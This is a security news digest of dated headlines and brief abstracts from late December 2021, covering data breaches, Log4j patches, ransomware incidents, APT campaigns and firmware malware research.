
December 2021

December 31, 2021 – Breach

Confusing data breach in Rhode Island leads to AG investigation

Abstract Earlier this week, the ACLU of Rhode Island asked RIPTA to explain why the personal information of people with no connection to the agency was included in the data breach.

ZDNet

December 31, 2021 – Breach

PulseTV discloses potential compromise of 200,000 credit cards

Abstract PulseTV (pulsetv.com), an American e-store that uses TV as a medium to reach customers, has disclosed a large-scale customer credit card compromise.

BleepingComputer

December 31, 2021 – Breach

The Have I Been Pwned service now includes 441K accounts stolen by RedLine malware

Abstract The Have I Been Pwned data breach notification service now includes credentials for 441K accounts that were stolen by RedLine malware. The Have I Been Pwned data breach notification service now allows victims of the RedLine malware to check if their...

Security Affairs

December 31, 2021 – Breach

Top 10 healthcare breaches in the U.S. exposed data of 19 million

Abstract The healthcare sector has been the target of hundreds of cyberattacks this year. A tally of public data breach reports so far shows that tens of millions of healthcare records have been exposed to unauthorized parties.

BleepingComputer

December 31, 2021 – Vulnerabilities

Multiple flaws in Netgear Nighthawk R6700v3 router are still unpatched

Abstract Researchers discovered multiple high-risk vulnerabilities affecting the latest firmware version for the Netgear Nighthawk R6700v3 router. Researchers from Tenable have discovered multiple vulnerabilities in the latest firmware version (version 1.0.4.120)...

Security Affairs

December 31, 2021 – Vulnerabilities

Netgear leaves vulnerabilities unpatched in Nighthawk router

Abstract Researchers have found half a dozen high-risk vulnerabilities in the latest firmware version for the Netgear Nighthawk R6700v3 router. At publishing time the flaws remain unpatched.

BleepingComputer

December 31, 2021 – Malware

How to implant a malware in hidden area of SSDs with Flex Capacity feature

Abstract Researchers devised a series of attacks against SSDs that could allow attackers to implant malware in a location that is not monitored by security solutions. Korean researchers devised a series of attacks against solid-state drives (SSDs) that could allow attackers to implant...

Security Affairs

December 30, 2021 – General

Hillicon Valley — Tech’s big year

Abstract Today is Thursday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.

The Hill

December 30, 2021 – Malware

New iLOBleed Rootkit Targeting HP Enterprise Servers with Data Wiping Attacks

Abstract A previously unknown rootkit has been found setting its sights on Hewlett-Packard Enterprise's Integrated Lights-Out (iLO) server management technology to carry out in-the-wild attacks that tamper with the firmware modules and completely wipe data off the infected systems. The discovery, which is the first instance of real-world malware in iLO firmware, was documented by Iranian cybersecurity firm Amnpardaz this week. "There are numerous aspects of iLO that make it an ideal utopia for malware and APT groups: Extremely high privileges (above any level of access in the operating system), very low-level access to the hardware, being totally out of the sight of the admins, and security tools, the general lack of knowledge and tools for inspecting iLO and/or protecting it, the persistence it provides for the malware to remain even after changing the operating system, and in particular being always running and never shutting down," the researchers said. Besides managin

The Hacker News

December 30, 2021 – General

What the Rise in Cyber-Recon Means for Your Security Strategy

Abstract Expect many more zero-day exploits in 2022, and cyberattacks using them being launched at a significantly higher rate, warns Aamir Lakhani, researcher at FortiGuard Labs.

Threatpost

December 30, 2021 – Policy and Law

K-12 Cybersecurity Act Signed Into Law

Abstract President Joe Biden signed the K-12 Cybersecurity Act into law, which lays out four objectives with the goal of strengthening the cybersecurity of the United States’ K-12 educational institutions.

Security Intelligence

December 30, 2021 – APT

Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution

Abstract A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Panda has been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems. Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed "large academic institution." The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors. The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch thr

The Hacker News

December 30, 2021 – Government

President enacts Ukraine’s Information Security Strategy

Abstract Amid extreme concerns of cyber warfare from Russia, Ukraine’s President Volodymyr Zelensky announced the launch of a new information security strategy policy that came into effect earlier this week.

Ukrinform

December 30, 2021 – General

Why Cyber Due Diligence Is Essential to the M&A Process

Abstract M&A creates a period of transition, where new ownership and management teams are coming into or out of their roles. This transitional phase presents a perfect opportunity for cybercriminals to attack.

Dark Reading

December 30, 2021 – Breach

Have I Been Pwned adds 441K accounts stolen by RedLine malware

Abstract The Have I Been Pwned data breach notification service now lets you check if your email and password are one of 441,000 accounts stolen in an information-stealing campaign using RedLine malware.

BleepingComputer

December 30, 2021 – Hacker

Chinese Hacker Group Uses Log4j Exploit to Target Academic Institution

Abstract A Chinese hacker group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday.

Cyberscoop

December 30, 2021 – Vulnerabilities

Flaws in DataVault encryption software impact multiple storage devices

Abstract Researchers found several vulnerabilities in third-party encryption software that is used by multiple storage devices from major vendors. Researcher Sylvain Pelissier has discovered that the DataVault encryption software made by ENC Security and used...

Security Affairs

December 30, 2021 – Breach

University loses 77TB of research data due to backup error

Abstract The Kyoto University in Japan has lost about 77TB of research data due to an error in the backup system of its Hewlett-Packard supercomputer.

BleepingComputer

December 30, 2021 – General

It’s time for a unified approach to securing data, applications, and the edge

Abstract Organizations usually manage the security of data, applications, and edge computing from disparate technologies and across different teams. This traditional approach may prove ineffective in future.

Help Net Security

December 30, 2021 – Malware

New iLOBleed Rootkit, the first time ever that malware targets iLO firmware

Abstract A previously unknown rootkit, dubbed iLOBleed, was used in attacks aimed at HP Enterprise servers that wiped data off the infected systems. iLOBleed is a previously undetected rootkit that was spotted targeting the HP Enterprise's Integrated Lights-Out...

Security Affairs

December 30, 2021 – Vulnerabilities

Firmware attack can drop persistent malware in hidden SSD area

Abstract Korean researchers have developed a set of attacks against some solid-state drives (SSDs) that could allow planting malware in a location that's beyond the reach of the user and security solutions.

BleepingComputer

December 30, 2021 – Criminals

AvosLocker ransomware gang releases a free decryptor after an affiliate hit US gov agency

Abstract The AvosLocker ransomware operators released a free decryptor after they accidentally encrypted the systems of a US government entity. The AvosLocker ransomware operation provided a free decryptor after they encrypted the systems of a US government agency. https://twitter.com/pancak3lullz/status/1476217440442925057 According...

Security Affairs

December 30, 2021 – Phishing

Twitter account of FBI’s fake chat app, ANOM seen trolling today

Abstract The Twitter account previously associated with the ANOM chat app is posting frivolous tweets this week. ANOM was a fake encrypted messaging platform created as part of a global sting operation led by the U.S. FBI, Australian Federal Police (AFP), and other law enforcement agencies to catch criminals.

BleepingComputer

December 30, 2021 – APT

China-linked APT group Aquatic Panda leverages Log4Shell in recent attack

Abstract China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution. China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) in an attack...

Security Affairs

December 29, 2021 – Covid-19

Cyber agency warns of increased threats to manufacturing groups during pandemic

Abstract Manufacturing organizations are at higher risk of being targeted by hackers during the COVID-19 pandemic, the nation’s key cybersecurity agency warned Wednesday.

The Hill

December 29, 2021 – Cryptocurrency

Ongoing Autom Cryptomining Malware Attacks Using Upgraded Evasion Tactics

Abstract An ongoing crypto mining campaign has upgraded its arsenal while evolving its defense evasion tactics that enable the threat actors to conceal the intrusions and fly under the radar, new research published today has revealed. Since first detected in 2019, a total of 84 attacks against its honeypot servers have been recorded to date, four of which transpired in 2021, according to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years. That said, 125 attacks have been spotted in the wild in the third quarter of 2021 alone, signaling that the attacks have not slowed down. Initial attacks involved executing a malicious command upon running a vanilla image named "alpine:latest" that resulted in the download of a shell script named "autom.sh." "Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official

The Hacker News

December 29, 2021 – Vulnerabilities

Silent danger: One in five aged domains is malicious, risky, or unsafe

Abstract The number of malicious dormant domains is on the rise, and as researchers warn, roughly 22.3% of strategically aged domains pose some form of danger.

BleepingComputer

December 29, 2021 – Breach

T-Mobile suffered a new data breach

Abstract T-Mobile discloses a new data breach that impacted a "very small number of customers" who were victims of SIM swap attacks. T-Mobile has suffered another security breach; threat actors gained access to the accounts of “a small number of” customers...

Security Affairs

December 29, 2021 – Criminals

Ransomware gang coughs up decryptor after realizing they hit the police

Abstract The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency.

BleepingComputer

December 29, 2021 – Vulnerabilities

Apache Log4j 2.17.1 fixes new remote code execution flaw (CVE-2021-44832)

Abstract The Apache Software Foundation released Log4j version 2.17.1 to address a recently discovered arbitrary code execution flaw tracked as CVE-2021-44832. The Apache Software Foundation released Log4j version 2.17.1 to address a recently discovered arbitrary...

Security Affairs

December 29, 2021 – Breach

T-Mobile says new data breach caused by SIM swap attacks

Abstract T-Mobile confirmed that recent reports of a new data breach are linked to notifications sent to a "very small number of customers" that they fell victim to SIM swap attacks.

BleepingComputer

December 29, 2021 – Vulnerabilities

Microsoft Defender Log4j scanner triggers false positive alerts

Abstract Microsoft Defender for Endpoint is currently showing "sensor tampering" alerts linked to the company's newly deployed Microsoft 365 Defender scanner for Log4j processes.

BleepingComputer

December 29, 2021 – Attack

Fintech firm hit by Log4j hack refuses to pay $5 million ransom

Abstract One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version. Soon enough, threat actors approached ONUS to extort $5 million and threatened to publish customer data should ONUS refuse to comply.

BleepingComputer

December 28, 2021 – Privacy

That Toy You Got for Christmas Could Be Spying on You

Abstract Security flaws in the recently released Fisher-Price Chatter Bluetooth telephone can allow nearby attackers to spy on calls or communicate with children using the device.

Threatpost

December 28, 2021 – Government

Congress zooms in on cybersecurity after banner year of attacks

Abstract The past 12 months stand as a banner year in the severity of cyberattacks that wreaked havoc on organizations large and small. 

The Hill

December 28, 2021 – General

2021 Wants Another Chance (A Lighter-Side Year in Review)

Abstract The year wasn’t ALL bad news. These sometimes cringe-worthy/sometimes laughable cybersecurity and other technology stories offer schadenfreude and WTF opportunities, and some giggles.

Threatpost

December 28, 2021 – Cryptocurrency

Washington grapples with how to expand crypto oversight

Abstract The cryptocurrency explosion has forced Washington to adapt federal financial rules to a quickly growing and changing industry.

The Hill

December 28, 2021 – Vulnerabilities

New Apache Log4j Update Released to Patch Newly Discovered Vulnerability

Abstract The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month. Tracked as CVE-2021-44832, the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JND

The Hacker News

December 28, 2021 – Hacker

Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers

Abstract Cybersecurity researchers have offered a detailed glimpse into a system called DoubleFeature that's dedicated to logging the different stages of post-exploitation stemming from the deployment of DanderSpritz, a full-featured malware framework used by the Equation Group. DanderSpritz came to light on April 14, 2017, when a hacking group known as the Shadow Brokers leaked the exploit tool, among others, under a dispatch titled "Lost in Translation." Also included in the leaks was EternalBlue, a cyberattack exploit developed by the U.S. National Security Agency (NSA) that enabled threat actors to carry out the NotPetya ransomware attack on unpatched Windows computers. The tool is a modular, stealthy, and fully functional framework that relies on dozens of plugins for post-exploitation activities on Windows and Linux hosts. DoubleFeature is one among them, which functions as a "diagnostic tool for victim machines carrying DanderSpritz," researchers from

The Hacker News

December 28, 2021 – Vulnerabilities

Log4j 2.17.1 out now, fixes new remote code execution bug

Abstract Apache has released another Log4j version, 2.17.1, fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.

BleepingComputer

December 28, 2021 – Malware

New Flagpro malware linked to Chinese state-backed hackers

Abstract The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms.

BleepingComputer

December 28, 2021 – Malware

RedLine malware shows why passwords shouldn’t be saved in browsers

Abstract The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.

BleepingComputer

December 28, 2021 – Breach

LastPass users warned their master passwords are compromised

Abstract Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations.

BleepingComputer

December 28, 2021 – Malware

Riskware Android streaming apps found on Samsung’s Galaxy store

Abstract Samsung's official Android app store, called the Galaxy Store, has had an infiltration of riskware apps that triggered multiple Play Protect warnings on people's devices.

BleepingComputer

December 27, 2021

Global Cyberattacks from Nation-State Actors Posing Greater Threats

Abstract Casey Ellis, CTO at Bugcrowd, outlines how international relations have deteriorated into a new sort of Cold War, with espionage playing out in the cyber-domain. 

Threatpost

December 27, 2021

Shutterfly hit by ransomware attack

Abstract Photography company Shutterfly announced this week that it had been hit by a ransomware attack that had impacted some services, making it the latest in a string of companies to be targeted by hackers looking for a payout. 

The Hill

December 27, 2021

The 5 Most-Wanted Threatpost Stories of 2021

Abstract A look back at what was hot with readers in this second year of the pandemic.

Threatpost

December 27, 2021

Garrett Walk-Through Metal Detectors Can Be Hacked Remotely

Abstract A number of security flaws have been uncovered in a networking component in Garrett Metal Detectors that could allow remote attackers to bypass authentication requirements, tamper with metal detector configurations, and even execute arbitrary code on the devices. "An attacker could manipulate this module to remotely monitor statistics on the metal detector, such as whether the alarm has been triggered or how many visitors have walked through," Cisco Talos noted in a disclosure publicized last week. "They could also make configuration changes, such as altering the sensitivity level of a device, which potentially poses a security risk to users who rely on these metal detectors." Talos security researcher Matt Wiseman has been credited with discovering and reporting these vulnerabilities on August 17, 2021. Patches have been released by the vendor on December 13, 2021. The flaws reside in Garrett iC Module, which enables users to communicate to walk-through me

The Hacker News

December 27, 2021

PECB Certified Lead Ethical Hacker: Take Your Career to the Next Level

Abstract Cybercrime is increasing exponentially and presents devastating risks for most organizations. According to Cybercrime Magazine, global cybercrime damage is predicted to hit $10.5 trillion annually as of 2025. One of the more recent and increasingly popular ways of tackling such issues is ethical hacking, which identifies potential security vulnerabilities at an early stage. Certified ethical hackers use advanced tools and strategies to prevent cyberattacks and help organizations strengthen their cybersecurity. Why Companies Should Hire Ethical Hackers As cyberattacks constantly evolve and improve, organizations must ensure that their defense systems and approach can keep up with the level and complexity of cyberattacks. In today's business era, organizations cannot afford to operate without identifying the vulnerabilities in their system and taking preventive measures. As such, ethical hackers provide several advantages: they offer a unique outsider's persp

The Hacker News

December 27, 2021

‘Spider-Man: No Way Home’ Pirated Downloads Contain Crypto-Mining Malware

Abstract Peter Parker might not be a mastermind cryptocurrency criminal, but the name Spiderman is quickly becoming more associated with the mining landscape. ReasonLabs, a leading provider of cybersecurity prevention and detection software, recently discovered a new form of malware hacking into customer computers in the guise of the latest Spiderman movie. As perhaps the most talked-about movie for some time, Spiderman: No Way Home represents an excellent opportunity for hackers. It's a chance to connect with millions of potential targets, and hack into computers all around the globe. All today's malicious actors need to do is promise their victims access to the latest movie, and they get an all-access pass to their PC. The cryptocurrency mining malware discovered by ReasonLabs disguises itself as a torrent for the Spiderman: No Way Home movie, encouraging viewers around the world to download the file, and open the computer to criminals. Using a Mask: Tricking Users into Dow

The Hacker News

December 27, 2021

QNAP NAS devices hit in surge of ech0raix ransomware attacks

Abstract Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt.

BleepingComputer

December 27, 2021

Shutterfly services disrupted by Conti ransomware attack

Abstract Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data.

BleepingComputer

December 22, 2021

Understanding the Offense’s Systemwide Advantage in Cyberspace

Abstract Attackers in cyberspace have had the systemwide advantage for decades. Reversing this requires both a more nuanced understanding of the offense-defense balance and innovations with leverage that works at scale across the internet.

Lawfare

December 22, 2021

Harris calls for ‘cyber doctrine’ to address increasing attacks

Abstract Vice President Harris is calling for a “cyber doctrine” and greater international coordination to address cybersecurity concerns after a year of mounting attacks. 

The Hill

December 22, 2021

Five Eyes nations warn of cyber threats from Apache vulnerability

Abstract Federal agencies in the United States, as well as top cybersecurity agencies in the other countries that make up the Five Eyes intelligence alliance, warned Wednesday that hackers are “actively exploiting” a recently uncovered vulnerability in Apache logging library log4j.

The Hill

December 21, 2021

DHS expands bug bounty program to encourage hunting down Apache vulnerability

Abstract The Department of Homeland Security (DHS) is expanding its recently announced bug bounty program for cyber vulnerabilities to include incentives for hackers to hunt down issues related to the Apache logging library log4j vulnerability. 

The Hill

December 21, 2021

UAE agency put spyware on phone of Jamal Khashoggi’s wife prior to murder: report

Abstract A United Arab Emirates (UAE) agency downloaded spyware from Israeli company NSO Group onto the phone of former reporter Jamal Khashoggi’s wife months before Khashoggi’s murder, new findings published Tuesday concluded.

The Hill

December 20, 2021

Towards OECD Principles for Government Access to Data

Abstract Nascent OECD work to identify principles on government access to data for law enforcement and national security purposes can have important normative significance but also faces political hurdles.

Lawfare

December 20, 2021

Belgian defense ministry hacked by attackers exploiting Apache vulnerability

Abstract Belgium’s Ministry of Defense was recently hacked by attackers exploiting the massive vulnerability in Apache logging library log4j that has become a worldwide security concern, according to multiple reports. 

The Hill

December 20, 2021

Justice Department indicts Russian hacker for allegedly participating in trading scheme

Abstract A Russian national was indicted and extradited to the United States this week for allegedly hacking into the networks of U.S. groups involved in stock market trading to profit from insider information, the Justice Department announced Monday. 

The Hill

December 19, 2021 – Malware

New stealthy DarkWatchman malware hides in the Windows Registry

Abstract A new malware named 'DarkWatchman' has emerged in the cybercrime underground, and it's a lightweight and highly-capable JavaScript RAT (Remote Access Trojan) paired with a C# keylogger.

BleepingComputer

December 19, 2021 – Criminals

Clop ransomware gang is leaking confidential data from the UK police

Abstract The Clop ransomware gang stole confidential data from the UK police and leaked it on the dark web because the victim refused to pay the ransom. Clop ransomware operators have stolen confidential information held by some British police, according to the media...

Security Affairs

December 19, 2021 – General

Security Affairs newsletter Round 345

Abstract A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are delivered free to your inbox. If you also want to receive the free newsletter with the international press, subscribe here....

Security Affairs

December 19, 2021 – Ransomware

TellYouThePass ransomware resurges and exploits Log4Shell in recent attacks

Abstract The TellYouThePass ransomware has resurged and is exploiting the Apache Log4j flaw (Log4Shell) to target both Linux and Windows systems. Researchers from KnownSec 404 Team and Sangfor Threat Intelligence Team reported that the TellYouThePass ransomware resurged...

Security Affairs

December 18, 2021 – Hacker

Trend Micro Spots Chinese Hackers Targeting Transportation Sector

Abstract Since the middle of 2020, a Chinese state-sponsored threat actor called 'Tropic Trooper' has been targeting transportation organizations and government entities related to the transportation sector, Trend Micro reports.

Security Week

December 18, 2021 – Vulnerabilities

New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability

Abstract Cybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection. "This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability," Matthew Warner, CTO of Blumira, said. "At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network." WebSockets allow for two-way communications between a web browser (or other client application) and a server, unlike HTTP, which is unidirectional where the client sends the request and the server sends the response. While the issue can be resolved by updating all local development and internet-facing environments to Log4j 2.16.0, Apache o

The Hacker News

December 18, 2021 – Vulnerabilities

Western Digital warns customers to update their My Cloud devices

Abstract Western Digital is urging customers to update their WD My Cloud devices to the latest available firmware to keep receiving security updates on My Cloud OS firmware reaching the end of support.

BleepingComputer

December 18, 2021 – Vulnerabilities

Understanding the Impact of Apache Log4j Vulnerability

Abstract More than 35,000 Java packages, amounting to over 8% of the Maven Central repository, have been impacted by the recently disclosed log4j vulnerabilities (1, 2), with widespread fallout across the software industry.

Google

December 18, 2021 – Vulnerabilities

Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability

Abstract The issues with Log4j continued to stack up as the Apache Software Foundation (ASF) on Friday rolled out yet another patch — version 2.17.0 — for the widely used logging library that could be exploited by malicious actors to stage a denial-of-service (DoS) attack. Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which the open-source nonprofit shipped earlier this week to remediate a second flaw that could result in remote code execution (CVE-2021-45046), which, in turn, stemmed from an "incomplete" fix for CVE-2021-44228, otherwise called the Log4Shell vulnerability. "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups," the ASF explained in a revised advisory. "When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control o

The Hacker News

December 18, 2021 – Denial Of Service

Upgraded to log4j 2.16? Surprise, there’s a 2.17 fixing DoS

Abstract Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes today with version 2.17.0 out that fixes CVE-2021-45105, a DoS vulnerability.

BleepingComputer

December 18, 2021 – Vulnerabilities

Western Digital customers have to update their My Cloud devices to latest firmware version

Abstract As My Cloud OS firmware is reaching the end of support, Western Digital customers have to update their WD My Cloud devices to the latest version. Western Digital is urging customers to update their WD My Cloud devices to the latest firmware version to continue...

Security Affairs

December 18, 2021 – Vulnerabilities

Apache releases the third patch to address a new Log4j flaw

Abstract Multiple flaws in the Log4j library are scaring organizations worldwide while threat actors are already exploiting them. Version 2.17 is the third fix issued in a week. While the experts were warning that threat actors are actively attempting to exploit...

Security Affairs

December 18, 2021 – Breach

1.8 Million customers of four sports gear sites impacted by credit cards breach Full Text

Abstract A cyber attack hit four affiliated online sports gear sites and resulted in the theft of credit cards for 1,813,224 customers. Threat actors have stolen credit cards belonging to 1,813,224 customers of four affiliated online sports gear sites. Below...

Security Affairs

December 17, 2021 – Vulnerabilities

Federal agencies ordered to immediately patch systems against Apache vulnerability Full Text

Abstract Federal agencies on Friday were ordered to immediately investigate and patch systems to prevent exploitation of a massive vulnerability in Apache logging library log4j that has been increasingly used by nations and cybercriminals to target organizations around the world.

The Hill

December 17, 2021 – Ransomware

Convergence Ahoy: Get Ready for Cloud-Based Ransomware Full Text

Abstract Oliver Tavakoli, CTO at Vectra AI, takes us inside the coming nexus of ransomware, supply-chain attacks and cloud deployments.

Threatpost

December 17, 2021 – Criminals

Conti Gang Suspected of Ransomware Attack on McMenamins Full Text

Abstract The incident occurred last weekend at the popular chain of restaurants, hotels and breweries, which is still facing disruptions.

Threatpost

December 17, 2021 – Ransomware

Ransomware Attackers Have ‘Industry Standards’ Too Full Text

Abstract In July 2021, KELA discovered 48 discussion threads on dark web marketplaces. From those threads, KELA determined that ransomware actors look for certain criteria when looking to purchase accesses.

Security Intelligence

December 17, 2021 – Privacy

Facebook Bans 7 ‘Cyber Mercenary’ Companies for Spying on 50,000 Users Full Text

Abstract Meta Platforms on Thursday revealed it took steps to deplatform seven cyber mercenaries that it said carried out "indiscriminate" targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies. To that end, the company  said  it alerted 50,000 users of Facebook and Instagram that their accounts were spied on by the companies, who offer a variety of services that run the spyware gamut from hacking tools for infiltrating mobile phones to creating fake social media accounts to monitor targets. It also removed 1,500 Facebook and Instagram accounts linked to these firms. "The global surveillance-for-hire industry targets people across the internet to collect intelligence, manipulate them into revealing information and compromise their devices and accounts," Meta's David Agranovich and Mike Dvilyanski said. "These compa

The Hacker News

December 17, 2021 – Ransomware

The Week in Ransomware - December 17th 2021 - Enter Log4j Full Text

Abstract A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.

BleepingComputer

December 17, 2021 – Vulnerabilities

Firefox fixes password leak via Windows Cloud Clipboard feature Full Text

Abstract At its core, the bug is related to Windows Cloud Clipboard, a feature added to Windows 10 v1809 release, a feature that allows users to sync their local clipboard history to their Microsoft accounts.

The Record

December 17, 2021 – Malware

New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021 Full Text

Abstract Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed  PseudoManuscrypt  that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the  Manuscrypt   malware , which is part of the  Lazarus  APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.

The Hacker News

December 17, 2021 – Ransomware

TellYouThePass ransomware revived in Linux, Windows Log4j attacks Full Text

Abstract Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.

BleepingComputer

December 17, 2021 – Phishing

Crypto Scam Revenue Touches $7.7 Billion Full Text

Abstract As per Chainalysis' 2022 Crypto Crime Report, crypto scams have earned a revenue of $7.7 billion from victims worldwide. This is an 81% rise from that in 2020. Rug pulls accounted for 37% of all crypto scam revenue.

Cyware Alerts - Hacker News

December 17, 2021 – Solution

How to Prevent Customer Support Help Desk Fraud Using VPN and Other Tools Full Text

Abstract It's no secret that the internet isn't a very safe place. And it's not hard to understand why. It's a medium that connects billions of people around the world that affords bad actors enough anonymity to wreak havoc without getting caught. It's almost as if the internet's tailor-made to enable scams and fraud. And that's just what it does. Right now, the world's on track to  lose $10.5 trillion every year  to cybercrime. That number is so large that it's hard for the average person to grasp. And when most people hear it, they imagine that money's coming mostly from large-scale data breaches and ransomware attacks on large companies. Although businesses are among the hardest hit each year, they're by no means the only target. Every day, internet users are targeted too. They face barrages of phishing emails, compromised websites, and booby-trapped downloads. But among all of the attacks aimed at rank-and-file users, there's one that stand

The Hacker News

December 17, 2021 – Breach

Credit card info of 1.8 million people stolen from sports gear sites Full Text

Abstract Four affiliated online sports gear sites have disclosed a cyberattack where threat actors stole credit cards for 1,813,224 customers.

BleepingComputer

December 17, 2021 – Hacker

New Report Sheds Light on Earth Centaur Activities Full Text

Abstract Researchers uncovered details about the Earth Centaur group that has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks ...

Cyware Alerts - Hacker News

December 17, 2021 – Vulnerabilities

CISA urges VMware admins to patch critical flaw in Workspace ONE UEM Full Text

Abstract CISA has asked VMware admins and users today to patch a critical security vulnerability found in the Workspace ONE UEM console that threat actors could abuse to gain access to sensitive information.

BleepingComputer

December 17, 2021 – Breach

Desjardins data breach: Class action lawsuit agreement reaches $201 million Full Text

Abstract A class-action lawsuit against Canadian financial services firm Desjardins has provisionally settled for $156 million after a 2019 data breach exposed the personal information of 10 million customers.

The Daily Swig

December 17, 2021 – Criminals

Conti ransomware gang exploits Log4Shell bug in its operations Full Text

Abstract The Conti ransomware gang is the first ransomware operation exploiting the Log4Shell vulnerability to target VMware vCenter Servers. Conti is the first professional ransomware crew observed leveraging a Log4Shell exploit to compromise VMware vCenter...

Security Affairs

December 17, 2021 – Government

US orders federal govt agencies to patch critical Log4j bug Full Text

Abstract US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.

BleepingComputer

December 17, 2021 – Solution

Google unleashes security ‘fuzzer’ on Log4Shell bug in open-source software Full Text

Abstract To seek out Log4Shell vulnerabilities in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j.

ZDNet

December 17, 2021 – Vulnerabilities

VMware fixes critical SSRF flaw in Workspace ONE UEM Console Full Text

Abstract VMware released security patches for a critical server-side request forgery (SSRF) vulnerability in Workspace ONE UEM console. VMware has addressed a critical server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-22054, in the Workspace...

Security Affairs

December 17, 2021 – Attack

Logistics giant warns of BEC emails following ransomware attack Full Text

Abstract Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.

BleepingComputer

December 17, 2021 – Botnet

Phorpiex botnet is back; in 2021 it stole $500K worth of crypto assets Full Text

Abstract Experts reported the resurgence of the Phorpiex botnet, which in one year enabled the theft of crypto assets worth half a million dollars. Experts at Check Point Research have monitored the resurgence of the Phorpiex botnet, an old threat that was involved...

Security Affairs

December 17, 2021 – Ransomware

Conti ransomware uses Log4j bug to hack VMware vCenter servers Full Text

Abstract Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

BleepingComputer

December 17, 2021 – Attack

PseudoManuscrypt, a mysterious massive cyber espionage campaign Full Text

Abstract Tens of thousands of devices worldwide, including many industrial control systems (ICS), have been hit by the PseudoManuscrypt spyware. Kaspersky researchers reported that tens of thousands of devices belonging to industrial and government organizations...

Security Affairs

December 17, 2021 – Vulnerabilities

All Log4j, logback bugs we know so far and why you MUST ditch 2.15 Full Text

